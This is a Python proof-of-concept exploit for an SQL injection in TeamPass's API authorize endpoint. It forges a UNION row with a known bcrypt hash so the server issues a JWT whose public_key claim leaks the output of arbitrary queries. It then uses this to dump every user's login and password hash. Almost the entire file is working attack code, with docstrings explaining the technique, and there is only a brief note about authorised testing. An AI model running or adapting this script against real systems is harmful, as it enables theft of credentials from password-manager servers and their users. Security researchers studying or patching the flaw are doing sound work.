import sys
import requests
import base64
import re
import json
import subprocess
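REQUEST_TIMEOUT = 15  # seconds; without a timeout a stalled target hangs the script forever


def extract_public_key(token: str):
    """Return the ``public_key`` claim of an unverified JWT, or ``None``.

    ``token`` is the ``header.payload.signature`` string the target issues.
    The payload is base64url-encoded (``-``/``_`` alphabet, padding
    stripped), so padding is restored and ``urlsafe_b64decode`` is used;
    the plain ``b64decode`` silently drops ``-``/``_`` characters and
    corrupts the result. The signature is deliberately not verified: the
    token is only a channel for the injected query's output, never a
    credential. Returns ``None`` for a malformed token, an undecodable
    payload, or a payload without a ``public_key`` claim.
    """
    parts = token.split('.')
    if len(parts) < 2:
        return None
    payload = parts[1] + '=' * (-len(parts[1]) % 4)
    try:
        claims = json.loads(base64.urlsafe_b64decode(payload))
    except ValueError:  # also covers binascii.Error and JSONDecodeError
        return None
    if not isinstance(claims, dict):
        return None
    return claims.get('public_key')


def main() -> None:
    """Dump TeamPass user logins and password hashes through the SQL
    injection in ``/api/index.php/authorize``.

    Usage: ``<script> <base-url>``. Exits with status 1 when no URL is
    given, the target is unreachable, the API feature is disabled, or the
    user count cannot be recovered. Output is one ``login: hash`` line per
    user on stdout; errors go to stderr so the dump stays parseable.

    NOTE(review): this is an exploit proof-of-concept. Run it only against
    systems you are explicitly authorised to test, and treat the dumped
    hashes as sensitive material.
    """
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <base-url>")
        sys.exit(1)
    # Tolerate a trailing slash so the path does not become '//api/...'.
    base_url = sys.argv[1].rstrip('/')
    vulnerable_url = f"{base_url}/api/index.php/authorize"

    with requests.Session() as session:
        # Probe first: the endpoint tells us when the API feature is off.
        try:
            response = session.get(vulnerable_url, timeout=REQUEST_TIMEOUT)
        except requests.RequestException as e:
            print(f"Error: {e}", file=sys.stderr)
            sys.exit(1)
        if "API usage is not allowed" in response.text:
            print("API feature is not enabled :-(")
            sys.exit(1)

        # Hard-coded bcrypt hash; presumably the hash of the literal
        # password sent below ("h4ck3d") so the forged UNION row passes the
        # server's password check -- confirm if tokens stop being issued.
        arbitrary_hash = '$2y$10$u5S27wYJCVbaPTRiHRsx7.iImx/WxRA8/tKvWdaWQ/iDuKlIkMbhq'

        def exec_sql(query: str):
            """Run the scalar ``query`` via the injection and return its result.

            The ``login`` field is interpolated unescaped into the server's
            SQL, so a UNION row is forged whose hash column is
            ``arbitrary_hash`` and whose third column is ``(query)``; that
            column is read back as the ``public_key`` claim of the JWT the
            server issues. Returns ``None`` on transport/HTTP errors, a
            non-JSON response, or a missing/unparseable token.
            """
            inject = (
                f"none' UNION SELECT id, '{arbitrary_hash}', ({query}), private_key, "
                "personal_folder, fonction_id, groupes_visibles, groupes_interdits, "
                "'foo' FROM teampass_users WHERE login='admin"
            )
            data = {"login": inject, "password": "h4ck3d", "apikey": "foo"}
            try:
                # json= sets Content-Type: application/json itself.
                response = session.post(vulnerable_url, json=data, timeout=REQUEST_TIMEOUT)
                response.raise_for_status()
                body = response.json()
            except (requests.RequestException, ValueError) as e:
                print(f"Error: {e}", file=sys.stderr)
                return None
            token = body.get('token') if isinstance(body, dict) else None
            if not token:
                return None
            return extract_public_key(token)

        users = exec_sql("SELECT COUNT(*) FROM teampass_users WHERE pw != ''")
        try:
            user_count = int(users)
        except (TypeError, ValueError):
            # None (request failed) or a non-numeric claim both land here.
            print("Failed to get user count", file=sys.stderr)
            sys.exit(1)
        print(f"There are {user_count} users in the system:")
        for i in range(user_count):
            # Identical ORDER BY in both queries so login and hash line up.
            where = f"FROM teampass_users WHERE pw != '' ORDER BY login ASC LIMIT {i},1"
            username = exec_sql(f"SELECT login {where}")
            password = exec_sql(f"SELECT pw {where}")
            if username is None or password is None:
                print(f"Failed to read user at offset {i}", file=sys.stderr)
                continue
            print(f"{username}: {password}")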
if __name__ == "__main__":
    # Script entry point; main() performs its own usage/error exits.
    raise SystemExit(main())